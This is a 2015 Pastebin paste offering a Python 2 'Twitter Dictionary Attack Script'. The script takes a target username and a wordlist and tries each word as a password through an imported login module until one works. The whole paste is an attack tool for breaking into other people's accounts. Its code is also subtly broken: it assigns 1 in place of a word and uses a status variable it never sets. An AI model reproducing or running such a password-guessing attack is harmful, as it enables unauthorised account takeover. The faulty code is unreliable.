Advertisement
Kyfx

Twitter Dictionary Attack Script Created By Kyfx

Dec 22nd, 2015
845
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.84 KB | None | 0 0
  1. If u want to script like this
  2. https://www.youtube.com/watch?v=95ui8IEYK2E <- Original owner coder
  3.  
  4. Windows Press F5 to run the script
  5.  
  6. import twitLogin
  7.  
  8. un = raw_input(“Username: “)
  9. w1 = raw_input(“Wordlist: “)
  10.  
  11. with open(w1, “r”) as fle:
  12. for i in fle:
  13. tmp = “”
  14. if i[-1] == “\n”:
  15. tmp = i[:-1]
  16. else:
  17. tmp = 1
  18.  
  19. print tmp
  20. if twitLogin.login(un, tmp):
  21. state = True
  22. break
  23.  
  24. print “\n\n”
  25.  
  26.  
  27. if state:
  28. print “The password has been found.”
  29. print “Username;”, un
  30. print “Password:”, tmp
  31. else:
  32. print”The password has not been found.”
  33. print “Try again with a different wordlist, or try to brute force the [asswprd!”
  34.  
  35. raw_input(“Press enter to finish.”)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement